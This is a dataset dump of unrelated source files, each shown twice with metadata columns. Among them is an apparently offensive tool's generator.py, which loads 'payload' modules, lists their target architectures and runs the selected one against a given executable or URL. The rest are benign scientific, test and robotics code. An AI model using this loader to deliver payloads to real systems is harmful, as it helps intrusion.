self.name = name
self.length = length
self.default_recombination_rate = default_recombination_rate
self.default_mutation_rate = default_mutation_rate
self.species = None
self.default_genetic_map = None
def __repr__(self):
return (
"{{'name': {}, 'length': {}, "
"'default_recombination_rate': {}, "
"'default_mutation_rate': {}}}".format(
self.name, self.length, self.default_recombination_rate,
self.default_mutation_rate))
def __str__(self):
return repr(self)
def recombination_map(self, map_name=None):
"""
Returns an :class:`msprime.RecombinationMap` instance representing the
recombination map for this chromosome. If ``map_name`` is provided,
return the corresponding recombination map; if not, use the default
recombination map for this species.
"""
if map_name is None:
map_name = self.default_genetic_map
genetic_map = genetic_maps.get_genetic_map(self.species, map_name)
if genetic_map.contains_chromosome_map(self.name):
ret = genetic_map.get_chromosome_map(self.name)
else:
warnings.warn(
"Warning: recombination map not found for chromosome: '{}'"
" on map: '{}', substituting a zero"
"-recombination map.".format(self.name, map_name))
ret = msprime.RecombinationMap.uniform_map(self.length, 0)
return ret
| en | 0.686265 | Infrastructure for defining basic information about the genomes of species. Class representing the genome for a species. .. todo:: Define the facilities that this object provides. This method return the weighted mean recombination rate across all chomosomes in the genome. :rtype: float Class representing a single chromosome for a species. .. todo:: Define the facilities that this object provides. Returns an :class:`msprime.RecombinationMap` instance representing the recombination map for this chromosome. If ``map_name`` is provided, return the corresponding recombination map; if not, use the default recombination map for this species. | 3.258478 | 3 |
lib/generator.py | jessonfoo/fELF | 549 | 6612405 | import glob
import importlib
import sys
from lib.misc import print_info
def load_payload(path):
    """Import and return the payload module at dotted *path*, or False on any failure."""
    try:
        module = importlib.import_module(path)
    except Exception:
        return False
    return module
def gather_payloads(payload_dir):
    """Discover every ``*.py`` payload module under *payload_dir*, keyed by its declared name."""
    discovered = {}
    for filepath in glob.iglob("{}*.py".format(payload_dir)):
        module_path = filepath[:-3].replace("/", ".")
        module = load_payload(module_path)
        if module:
            try:
                # Each payload advertises itself via a `desc` dict.
                key = module.desc["name"].lower()
                discovered[key] = module
                print_info("Loaded Payload: '{}'".format(key), "!")
            except Exception:
                print_info("Error Loading Payload", "-")
            else:
                continue
        print_info("Unable to Load: {}".format(module_path), "-")
    return discovered
def generate(executable, is_url, payload_dir, payload_to_use):
payloads = gather_payloads(payload_dir)
if payloads:
if payload_to_use:
if payload_to_use in payloads:
print_info("Using Payload: '{}'".format(payload_to_use), "!")
return payloads[payload_to_use].main(is_url, executable)
else:
print_info("not found", "-")
else:
print("-"*20)
for name, payload in payloads.items():
info = payload.desc
print("Payload Name: '{}'".format(name))
print("\tPayload Description: '{}'".format(info["description"]))
print("\tCompatible Architectures: '{}'".format(info["archs"]))
print("\tRequired Python Version on Target: {}".format(info["python_vers"]))
print("-"*20)
while True:
choice = input("Choose Payload (Q to Quit)>> ").lower()
if choice == "q":
break
else:
if choice in payloads:
print_info("Using Payload: '{}'".format(choice), "!")
return payloads[choice].main(is_url, executable)
else:
print_info("Payload Not Found", "-")
else:
print_info("No Useable Payloads", "-") | import glob
import importlib
import sys
from lib.misc import print_info
def load_payload(path):
try:
return importlib.import_module(path)
except Exception as e:
return False
def gather_payloads(payload_dir):
payload_to_name = {}
for filepath in glob.iglob("{}*.py".format(payload_dir)):
payload_import_name = filepath[:-3].replace("/", ".")
payload = load_payload(payload_import_name)
if payload:
try:
name = payload.desc["name"].lower()
payload_to_name[name] = payload
print_info("Loaded Payload: '{}'".format(name), "!")
continue
except Exception as e:
print_info("Error Loading Payload", "-")
print_info("Unable to Load: {}".format(payload_import_name), "-")
return payload_to_name
def generate(executable, is_url, payload_dir, payload_to_use):
payloads = gather_payloads(payload_dir)
if payloads:
if payload_to_use:
if payload_to_use in payloads:
print_info("Using Payload: '{}'".format(payload_to_use), "!")
return payloads[payload_to_use].main(is_url, executable)
else:
print_info("not found", "-")
else:
print("-"*20)
for name, payload in payloads.items():
info = payload.desc
print("Payload Name: '{}'".format(name))
print("\tPayload Description: '{}'".format(info["description"]))
print("\tCompatible Architectures: '{}'".format(info["archs"]))
print("\tRequired Python Version on Target: {}".format(info["python_vers"]))
print("-"*20)
while True:
choice = input("Choose Payload (Q to Quit)>> ").lower()
if choice == "q":
break
else:
if choice in payloads:
print_info("Using Payload: '{}'".format(choice), "!")
return payloads[choice].main(is_url, executable)
else:
print_info("Payload Not Found", "-")
else:
print_info("No Useable Payloads", "-") | none | 1 | 2.642253 | 3 | |
cms/tests/apphooks.py | s-a-s-forks/django-cms | 1 | 6612406 | <reponame>s-a-s-forks/django-cms
# -*- coding: utf-8 -*-
from __future__ import with_statement
from cms.apphook_pool import apphook_pool
from cms.appresolver import applications_page_check, clear_app_resolvers
from cms.models.titlemodels import Title
from cms.test.testcases import CMSTestCase
from cms.test.util.context_managers import SettingsOverride
from django.contrib.auth.models import User
from django.core.urlresolvers import clear_url_caches, reverse
import sys
APP_NAME = 'SampleApp'
APP_MODULE = "testapp.sampleapp.cms_app"
class ApphooksTestCase(CMSTestCase):
def setUp(self):
clear_app_resolvers()
clear_url_caches()
def test_01_explicit_apphooks(self):
"""
Test explicit apphook loading with the CMS_APPHOOKS setting.
"""
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
apphooks = (
'%s.%s' % (APP_MODULE, APP_NAME),
)
with SettingsOverride(CMS_APPHOOKS=apphooks):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_02_implicit_apphooks(self):
"""
Test implicit apphook loading with INSTALLED_APPS + cms_app.py
"""
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
apps = ['testapp.sampleapp']
with SettingsOverride(INSTALLED_APPS=apps, ROOT_URLCONF='testapp.urls_for_apphook_tests'):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_03_apphook_on_root(self):
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
with SettingsOverride(ROOT_URLCONF='testapp.urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', '<EMAIL>', 'admin')
page = self.create_page(user=superuser, published=True)
english_title = page.title_set.all()[0]
self.assertEquals(english_title.language, 'en')
Title.objects.create(
language='de',
title='%s DE' % english_title.title,
slug=english_title.slug,
path=english_title.path,
page=page,
)
page.title_set.all().update(application_urls='SampleApp')
self.assertTrue(page.publish())
response = self.client.get(self.get_pages_root())
self.assertTemplateUsed(response, 'sampleapp/home.html')
apphook_pool.clear()
def test_04_get_page_for_apphook(self):
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
with SettingsOverride(ROOT_URLCONF='testapp.second_urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', '<EMAIL>', 'admin')
page = self.create_page(user=superuser, published=True)
self.create_title(page.get_title(), page.get_slug(), 'de', page)
child_page = self.create_page(page, user=superuser, published=True)
self.create_title(child_page.get_title(), child_page.get_slug(), 'de', child_page)
child_child_page = self.create_page(child_page, user=superuser, published=True)
self.create_title(child_child_page.get_title(), child_child_page.get_slug(), 'de', child_child_page)
child_child_page.title_set.all().update(application_urls='SampleApp')
child_child_page.publish()
# publisher_public is set to draft on publish, issue with onetoone reverse
child_child_page = self.reload(child_child_page)
en_title = child_child_page.publisher_public.get_title_obj('en')
path = reverse('en:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'en'
attached_to_page = applications_page_check(request, path=path[1:]) # strip leading slash
self.assertEquals(attached_to_page.pk, en_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, en_title.title)
de_title = child_child_page.publisher_public.get_title_obj('de')
path = reverse('de:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'de'
attached_to_page = applications_page_check(request, path=path[4:]) # strip leading slash and language prefix
self.assertEquals(attached_to_page.pk, de_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, de_title.title)
apphook_pool.clear() | # -*- coding: utf-8 -*-
from __future__ import with_statement
from cms.apphook_pool import apphook_pool
from cms.appresolver import applications_page_check, clear_app_resolvers
from cms.models.titlemodels import Title
from cms.test.testcases import CMSTestCase
from cms.test.util.context_managers import SettingsOverride
from django.contrib.auth.models import User
from django.core.urlresolvers import clear_url_caches, reverse
import sys
APP_NAME = 'SampleApp'
APP_MODULE = "testapp.sampleapp.cms_app"
class ApphooksTestCase(CMSTestCase):
def setUp(self):
clear_app_resolvers()
clear_url_caches()
def test_01_explicit_apphooks(self):
"""
Test explicit apphook loading with the CMS_APPHOOKS setting.
"""
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
apphooks = (
'%s.%s' % (APP_MODULE, APP_NAME),
)
with SettingsOverride(CMS_APPHOOKS=apphooks):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_02_implicit_apphooks(self):
"""
Test implicit apphook loading with INSTALLED_APPS + cms_app.py
"""
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
apps = ['testapp.sampleapp']
with SettingsOverride(INSTALLED_APPS=apps, ROOT_URLCONF='testapp.urls_for_apphook_tests'):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_03_apphook_on_root(self):
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
with SettingsOverride(ROOT_URLCONF='testapp.urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', '<EMAIL>', 'admin')
page = self.create_page(user=superuser, published=True)
english_title = page.title_set.all()[0]
self.assertEquals(english_title.language, 'en')
Title.objects.create(
language='de',
title='%s DE' % english_title.title,
slug=english_title.slug,
path=english_title.path,
page=page,
)
page.title_set.all().update(application_urls='SampleApp')
self.assertTrue(page.publish())
response = self.client.get(self.get_pages_root())
self.assertTemplateUsed(response, 'sampleapp/home.html')
apphook_pool.clear()
def test_04_get_page_for_apphook(self):
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
with SettingsOverride(ROOT_URLCONF='testapp.second_urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', '<EMAIL>', 'admin')
page = self.create_page(user=superuser, published=True)
self.create_title(page.get_title(), page.get_slug(), 'de', page)
child_page = self.create_page(page, user=superuser, published=True)
self.create_title(child_page.get_title(), child_page.get_slug(), 'de', child_page)
child_child_page = self.create_page(child_page, user=superuser, published=True)
self.create_title(child_child_page.get_title(), child_child_page.get_slug(), 'de', child_child_page)
child_child_page.title_set.all().update(application_urls='SampleApp')
child_child_page.publish()
# publisher_public is set to draft on publish, issue with onetoone reverse
child_child_page = self.reload(child_child_page)
en_title = child_child_page.publisher_public.get_title_obj('en')
path = reverse('en:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'en'
attached_to_page = applications_page_check(request, path=path[1:]) # strip leading slash
self.assertEquals(attached_to_page.pk, en_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, en_title.title)
de_title = child_child_page.publisher_public.get_title_obj('de')
path = reverse('de:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'de'
attached_to_page = applications_page_check(request, path=path[4:]) # strip leading slash and language prefix
self.assertEquals(attached_to_page.pk, de_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, de_title.title)
apphook_pool.clear() | en | 0.84506 | # -*- coding: utf-8 -*- Test explicit apphook loading with the CMS_APPHOOKS setting. Test implicit apphook loading with INSTALLED_APPS + cms_app.py # publisher_public is set to draft on publish, issue with onetoone reverse # strip leading slash # strip leading slash and language prefix | 2.06301 | 2 |
Py Apple Dynamics V6.8/Py Apple Dynamics V6.8 固件及程序/V6.8 源代码/PA_ATTITUDE.py | Musyue/py-apple-quadruped-robot | 495 | 6612407 | #Copyright Deng(灯哥) (<EMAIL>) Py-apple dog project
#Github:https://github.com/ToanTech/py-apple-quadruped-robot
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at:http://www.apache.org/licenses/LICENSE-2.0
from math import sin,cos,pi
def cal_ges(PIT,ROL,l,b,w,x,Hc):
    """
    Body-attitude solver for a quadruped: rotate the body by pitch/roll
    and return each leg's foot target in its sagittal plane.

    PIT, ROL -- body pitch and roll in degrees (yaw is fixed at 0 below)
    l, b     -- body length and width between the hip joints
    w        -- lateral (y) offset term; NOTE(review): the y components
                computed with it (AB*_y) are never returned -- confirm
                whether that is intended
    x        -- longitudinal shift of the body over the feet
    Hc       -- standing height of the body centre
    Returns (x1, x2, x3, x4, y1, y2, y3, y4): per-leg planar targets,
    where xi is the forward and yi the vertical (z) coordinate.
    """
    YA=0
    # Degrees to radians (yaw YA is hard-wired to 0).
    P=PIT*pi/180
    R=ROL*pi/180
    Y=YA*pi/180
    # Leg 1
    ABl_x=l/2 - x -(l*cos(P)*cos(Y))/2 + (b*cos(P)*sin(Y))/2
    ABl_y=w/2 - (b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
    ABl_z= - Hc - (b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
    # Leg 2
    AB2_x=l/2 - x - (l*cos(P)*cos(Y))/2 - (b*cos(P)*sin(Y))/2
    AB2_y=(b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - w/2 - (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
    AB2_z=(b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc - (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
    # Leg 3
    AB3_x=(l*cos(P)*cos(Y))/2 - x - l/2 + (b*cos(P)*sin(Y))/2
    AB3_y=w/2 - (b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 + (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
    AB3_z=(l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2 - (b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc
    # Leg 4
    AB4_x=(l*cos(P)*cos(Y))/2 - x - l/2 - (b*cos(P)*sin(Y))/2
    AB4_y=(b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - w/2 + (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
    AB4_z=(b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc + (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
    # Output mapping: slots 3 and 4 swap legs 4 and 3.
    x1=ABl_x
    y1=ABl_z
    x2=AB2_x
    y2=AB2_z
    x3=AB4_x
    y3=AB4_z
    x4=AB3_x
    y4=AB3_z
    return x1,x2,x3,x4,y1,y2,y3,y4
| #Copyright Deng(灯哥) (<EMAIL>) Py-apple dog project
#Github:https://github.com/ToanTech/py-apple-quadruped-robot
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at:http://www.apache.org/licenses/LICENSE-2.0
from math import sin,cos,pi
def cal_ges(PIT,ROL,l,b,w,x,Hc):
YA=0
P=PIT*pi/180
R=ROL*pi/180
Y=YA*pi/180
#腿1
ABl_x=l/2 - x -(l*cos(P)*cos(Y))/2 + (b*cos(P)*sin(Y))/2
ABl_y=w/2 - (b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
ABl_z= - Hc - (b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
#腿2
AB2_x=l/2 - x - (l*cos(P)*cos(Y))/2 - (b*cos(P)*sin(Y))/2
AB2_y=(b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - w/2 - (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
AB2_z=(b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc - (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
#腿3
AB3_x=(l*cos(P)*cos(Y))/2 - x - l/2 + (b*cos(P)*sin(Y))/2
AB3_y=w/2 - (b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 + (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
AB3_z=(l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2 - (b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc
#腿4
AB4_x=(l*cos(P)*cos(Y))/2 - x - l/2 - (b*cos(P)*sin(Y))/2
AB4_y=(b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - w/2 + (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
AB4_z=(b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc + (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
x1=ABl_x
y1=ABl_z
x2=AB2_x
y2=AB2_z
x3=AB4_x
y3=AB4_z
x4=AB3_x
y4=AB3_z
return x1,x2,x3,x4,y1,y2,y3,y4
| en | 0.63241 | #Copyright Deng(灯哥) (<EMAIL>) Py-apple dog project #Github:https://github.com/ToanTech/py-apple-quadruped-robot #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at:http://www.apache.org/licenses/LICENSE-2.0 #腿1 #腿2 #腿3 #腿4 | 2.420916 | 2 |
coursach2/generator.py | lisovskey/coursach2 | 5 | 6612408 | '''
Generation helpers
'''
import math
from random import randint
def generate_dots(num, width, height):
    '''
    Yield *num* random (x, y) points with 0 <= x <= width and 0 <= y <= height.
    '''
    produced = 0
    while produced < num:
        yield randint(0, width), randint(0, height)
        produced += 1
def generate_graph(dots, neighbourhood_size, distance_range=(10, 100)):
    '''
    Build and return a graph as a dict mapping each node id to a dict of
    ``neighbour_id -> distance`` covering the ``neighbourhood_size``
    closest ids on either side.

    Distances are kept symmetric: if the neighbour's node was already
    built, its stored distance is reused; otherwise a random one is
    drawn from ``distance_range`` (inclusive).
    '''
    def distance(node_id, neighbour_id):
        '''
        Return the already-assigned symmetric distance, or a new random one.
        '''
        if graph.get(neighbour_id):
            return graph[neighbour_id][node_id]
        return randint(*distance_range)

    graph = {}
    # Only the index matters here; the previous version iterated
    # enumerate(reversed(dots)) and discarded the element.
    for node_id in range(len(dots)):
        node = {}
        for delta in range(1, neighbourhood_size + 1):
            neighbour_id = node_id + delta
            if neighbour_id < len(dots):
                node[neighbour_id] = distance(node_id, neighbour_id)
            neighbour_id = node_id - delta
            if neighbour_id >= 0:
                node[neighbour_id] = distance(node_id, neighbour_id)
        graph[node_id] = node
    return graph
| '''
Generation helpers
'''
import math
from random import randint
def generate_dots(num, width, height):
'''
yield tuple of x, y coordinates
'''
for _ in range(num):
yield randint(0, width), randint(0, height)
def generate_graph(dots, neighbourhood_size, distance_range=(10, 100)):
'''
yield tuple of id and node with distances to its neighbours
'''
def distance(node_id, neighbour_id):
'''
return random or existing distance
'''
if graph.get(neighbour_id):
return graph[neighbour_id][node_id]
return randint(*distance_range)
graph = {}
for node_id, _ in enumerate(reversed(dots)):
node = {}
for delta in range(1, neighbourhood_size + 1):
neighbour_id = node_id + delta
if neighbour_id < len(dots):
node[neighbour_id] = distance(node_id, neighbour_id)
neighbour_id = node_id - delta
if neighbour_id >= 0:
node[neighbour_id] = distance(node_id, neighbour_id)
graph[node_id] = node
return graph
| en | 0.767427 | Generation helpers yield tuple of x, y coordinates yield tuple of id and node with distances to its neighbours return random or existing distance | 3.68066 | 4 |
lines_to_lengths_test.py | cdleary/zydis_bazel | 0 | 6612409 | import subprocess
import textwrap
import unittest
from tools.python.runfiles import runfiles
class LinesToLengthsTest(unittest.TestCase):

    def test_examples_with_useless_suffixes(self):
        """Each hex-byte line yields one decoded length; trailing (useless) bytes are ignored."""
        stdin_text = textwrap.dedent("""
        90
        90 00
        41 50
        41 50 01
        """).strip()
        rf = runfiles.Create()
        tool = rf.Rlocation('zydis_bazel/lines_to_lengths')
        stdout = subprocess.check_output(
            [tool], input=stdin_text.encode('utf-8')).decode('utf-8')
        self.assertEqual(stdout.splitlines(), ['1', '1', '2', '2'])
if __name__ == '__main__':
unittest.main()
| import subprocess
import textwrap
import unittest
from tools.python.runfiles import runfiles
class LinesToLengthsTest(unittest.TestCase):
def test_examples_with_useless_suffixes(self):
text = textwrap.dedent("""
90
90 00
41 50
41 50 01
""").strip()
r = runfiles.Create()
results = subprocess.check_output(
[r.Rlocation('zydis_bazel/lines_to_lengths')],
input=text.encode('utf-8'),
).decode('utf-8')
self.assertEqual(results.splitlines(), ['1', '1', '2', '2'])
if __name__ == '__main__':
unittest.main()
| en | 0.186367 | 90 90 00 41 50 41 50 01 | 2.91267 | 3 |
duplik2/__main__.py | eun-plata/proyecto_plata | 0 | 6612410 | <filename>duplik2/__main__.py
from duplik2 import *
# CLI parser for the advertised 'path' argument.
# NOTE(review): parse_args() is never called, so 'path' is ignored and the
# hard-coded root_dir below is what actually runs -- confirm intent.
parser = argparse.ArgumentParser(description='Find duplicated files in your folder')
parser.add_argument('path', type=str, help='Absolute path')
# Hard-coded scan root (TODO: replace with parser.parse_args().path).
root_dir = "/Users/eunyoungcho/Pictures/2019/example"
command_find_repeated(root_dir)
| <filename>duplik2/__main__.py
from duplik2 import *
parser = argparse.ArgumentParser(description='Find duplicated files in your folder')
parser.add_argument('path', type=str, help='Absolute path')
root_dir = "/Users/eunyoungcho/Pictures/2019/example"
command_find_repeated(root_dir)
| none | 1 | 2.785449 | 3 | |
tests/utils.py | Clariteia/minos_microservice_aggregate | 3 | 6612411 | <reponame>Clariteia/minos_microservice_aggregate
from __future__ import (
annotations,
)
import sys
import unittest
from datetime import (
timedelta,
)
from pathlib import (
Path,
)
from typing import (
Optional,
)
from unittest import (
TestCase,
)
from dependency_injector import (
containers,
providers,
)
from minos.aggregate import (
Aggregate,
Entity,
EntitySet,
EventEntry,
InMemoryEventRepository,
InMemorySnapshotRepository,
InMemoryTransactionRepository,
ModelRef,
ValueObject,
ValueObjectSet,
)
from minos.common import (
Lock,
MinosPool,
MinosSetup,
current_datetime,
)
BASE_PATH = Path(__file__).parent
class MinosTestCase(unittest.IsolatedAsyncioTestCase):
def setUp(self) -> None:
super().setUp()
self.broker_publisher = FakeBroker()
self.broker_pool = FakeBrokerPool()
self.lock_pool = FakeLockPool()
self.transaction_repository = InMemoryTransactionRepository(lock_pool=self.lock_pool)
self.event_repository = InMemoryEventRepository(
broker_publisher=self.broker_publisher,
transaction_repository=self.transaction_repository,
lock_pool=self.lock_pool,
)
self.snapshot_repository = InMemorySnapshotRepository(
event_repository=self.event_repository, transaction_repository=self.transaction_repository
)
self.container = containers.DynamicContainer()
self.container.broker_publisher = providers.Object(self.broker_publisher)
self.container.broker_pool = providers.Object(self.broker_pool)
self.container.transaction_repository = providers.Object(self.transaction_repository)
self.container.lock_pool = providers.Object(self.lock_pool)
self.container.event_repository = providers.Object(self.event_repository)
self.container.snapshot_repository = providers.Object(self.snapshot_repository)
self.container.wire(
modules=[sys.modules["minos.aggregate"], sys.modules["minos.networks"], sys.modules["minos.common"]]
)
async def asyncSetUp(self):
await super().asyncSetUp()
await self.broker_publisher.setup()
await self.transaction_repository.setup()
await self.lock_pool.setup()
await self.event_repository.setup()
await self.snapshot_repository.setup()
async def asyncTearDown(self):
await self.snapshot_repository.destroy()
await self.event_repository.destroy()
await self.lock_pool.destroy()
await self.transaction_repository.destroy()
await self.broker_publisher.destroy()
await super().asyncTearDown()
def tearDown(self) -> None:
self.container.unwire()
super().tearDown()
class TestRepositorySelect(unittest.IsolatedAsyncioTestCase):
def assert_equal_repository_entries(self: TestCase, expected: list[EventEntry], observed: list[EventEntry]) -> None:
"""For testing purposes."""
self.assertEqual(len(expected), len(observed))
for e, o in zip(expected, observed):
self.assertEqual(type(e), type(o))
self.assertEqual(e.aggregate_uuid, o.aggregate_uuid)
self.assertEqual(e.aggregate_name, o.aggregate_name)
self.assertEqual(e.version, o.version)
self.assertEqual(e.data, o.data)
self.assertEqual(e.id, o.id)
self.assertEqual(e.action, o.action)
self.assertAlmostEqual(e.created_at or current_datetime(), o.created_at, delta=timedelta(seconds=5))
class FakeBroker(MinosSetup):
"""For testing purposes."""
async def send(self, *args, **kwargs) -> None:
"""For testing purposes."""
async def get_one(self, *args, **kwargs):
"""For testing purposes."""
async def get_many(self, *args, **kwargs):
"""For testing purposes."""
class FakeAsyncIterator:
"""For testing purposes."""
def __init__(self, seq):
self.iter = iter(seq)
def __aiter__(self):
return self
async def __anext__(self):
try:
return next(self.iter)
except StopIteration:
raise StopAsyncIteration
class FakeLock(Lock):
"""For testing purposes."""
def __init__(self, key=None, *args, **kwargs):
if key is None:
key = "fake"
super().__init__(key, *args, **kwargs)
async def __aexit__(self, exc_type, exc_val, exc_tb):
return
class FakeLockPool(MinosPool):
"""For testing purposes."""
async def _create_instance(self):
return FakeLock()
async def _destroy_instance(self, instance) -> None:
"""For testing purposes."""
class FakeBrokerPool(MinosPool):
"""For testing purposes."""
async def _create_instance(self):
return FakeBroker()
async def _destroy_instance(self, instance) -> None:
"""For testing purposes."""
class Owner(Aggregate):
"""Aggregate ``Owner`` class for testing purposes."""
name: str
surname: str
age: Optional[int]
class Car(Aggregate):
"""Aggregate ``Car`` class for testing purposes."""
doors: int
color: str
owner: Optional[ModelRef[Owner]]
class Order(Aggregate):
"""For testing purposes"""
products: EntitySet[OrderItem]
reviews: ValueObjectSet[Review]
class OrderItem(Entity):
"""For testing purposes"""
amount: int
class Review(ValueObject):
"""For testing purposes."""
message: str
| from __future__ import (
annotations,
)
import sys
import unittest
from datetime import (
timedelta,
)
from pathlib import (
Path,
)
from typing import (
Optional,
)
from unittest import (
TestCase,
)
from dependency_injector import (
containers,
providers,
)
from minos.aggregate import (
Aggregate,
Entity,
EntitySet,
EventEntry,
InMemoryEventRepository,
InMemorySnapshotRepository,
InMemoryTransactionRepository,
ModelRef,
ValueObject,
ValueObjectSet,
)
from minos.common import (
Lock,
MinosPool,
MinosSetup,
current_datetime,
)
BASE_PATH = Path(__file__).parent
class MinosTestCase(unittest.IsolatedAsyncioTestCase):
def setUp(self) -> None:
super().setUp()
self.broker_publisher = FakeBroker()
self.broker_pool = FakeBrokerPool()
self.lock_pool = FakeLockPool()
self.transaction_repository = InMemoryTransactionRepository(lock_pool=self.lock_pool)
self.event_repository = InMemoryEventRepository(
broker_publisher=self.broker_publisher,
transaction_repository=self.transaction_repository,
lock_pool=self.lock_pool,
)
self.snapshot_repository = InMemorySnapshotRepository(
event_repository=self.event_repository, transaction_repository=self.transaction_repository
)
self.container = containers.DynamicContainer()
self.container.broker_publisher = providers.Object(self.broker_publisher)
self.container.broker_pool = providers.Object(self.broker_pool)
self.container.transaction_repository = providers.Object(self.transaction_repository)
self.container.lock_pool = providers.Object(self.lock_pool)
self.container.event_repository = providers.Object(self.event_repository)
self.container.snapshot_repository = providers.Object(self.snapshot_repository)
self.container.wire(
modules=[sys.modules["minos.aggregate"], sys.modules["minos.networks"], sys.modules["minos.common"]]
)
async def asyncSetUp(self):
await super().asyncSetUp()
await self.broker_publisher.setup()
await self.transaction_repository.setup()
await self.lock_pool.setup()
await self.event_repository.setup()
await self.snapshot_repository.setup()
async def asyncTearDown(self):
await self.snapshot_repository.destroy()
await self.event_repository.destroy()
await self.lock_pool.destroy()
await self.transaction_repository.destroy()
await self.broker_publisher.destroy()
await super().asyncTearDown()
def tearDown(self) -> None:
self.container.unwire()
super().tearDown()
class TestRepositorySelect(unittest.IsolatedAsyncioTestCase):
def assert_equal_repository_entries(self: TestCase, expected: list[EventEntry], observed: list[EventEntry]) -> None:
"""For testing purposes."""
self.assertEqual(len(expected), len(observed))
for e, o in zip(expected, observed):
self.assertEqual(type(e), type(o))
self.assertEqual(e.aggregate_uuid, o.aggregate_uuid)
self.assertEqual(e.aggregate_name, o.aggregate_name)
self.assertEqual(e.version, o.version)
self.assertEqual(e.data, o.data)
self.assertEqual(e.id, o.id)
self.assertEqual(e.action, o.action)
self.assertAlmostEqual(e.created_at or current_datetime(), o.created_at, delta=timedelta(seconds=5))
class FakeBroker(MinosSetup):
"""For testing purposes."""
async def send(self, *args, **kwargs) -> None:
"""For testing purposes."""
async def get_one(self, *args, **kwargs):
"""For testing purposes."""
async def get_many(self, *args, **kwargs):
"""For testing purposes."""
class FakeAsyncIterator:
"""For testing purposes."""
def __init__(self, seq):
self.iter = iter(seq)
def __aiter__(self):
return self
async def __anext__(self):
try:
return next(self.iter)
except StopIteration:
raise StopAsyncIteration
class FakeLock(Lock):
"""For testing purposes."""
def __init__(self, key=None, *args, **kwargs):
if key is None:
key = "fake"
super().__init__(key, *args, **kwargs)
